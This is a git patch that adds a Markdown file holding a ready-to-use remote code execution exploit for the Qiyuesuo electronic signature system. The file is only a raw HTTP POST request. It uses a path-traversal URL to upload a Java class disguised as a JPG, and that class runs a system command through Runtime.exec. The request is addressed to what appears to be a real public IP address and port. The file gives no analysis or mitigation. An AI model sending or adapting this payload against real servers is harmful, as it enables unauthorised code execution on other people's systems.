From 3958a0acecfd18f47d3a43705070afc4f777aa56 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 21:09:43 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A5=91=E7=BA=A6=E9=94=81=E7=94=B5?= =?UTF-8?q?=E5=AD=90=E7=AD=BE=E7=AB=A0=E7=B3=BB=E7=BB=9FRCE.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 契约锁电子签章系统RCE.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 契约锁电子签章系统RCE.md diff --git a/契约锁电子签章系统RCE.md b/契约锁电子签章系统RCE.md new file mode 100644 index 0000000..21b01d8 --- /dev/null +++ b/契约锁电子签章系统RCE.md @@ -0,0 +1,29 @@ +## 契约锁电子签章系统RCE +``` +POST /callback/%2E%2E;/code/upload HTTP/1.1 +Host: 103.242.174.137:9180 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Origin: https://103.242.174.137:9180 +Referer: https://103.242.174.137:9180 +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Connection: close + +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Content-Disposition: form-data; name="type"; + +TIMETASK +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R +Content-Disposition: form-data; name="file";filename="qys.jpg" + +package qiyuesuo; + +import com.qiyuesuo.utask.java.BaseTimerTask; + +public class qiyuesuo004 extends BaseTimerTask { +    static {try{Runtime.getRuntime().exec("whoami");}catch (Exception e){}} +} +------WebKitFormBoundaryco2lQ5vxCOn9Aq2R-- +```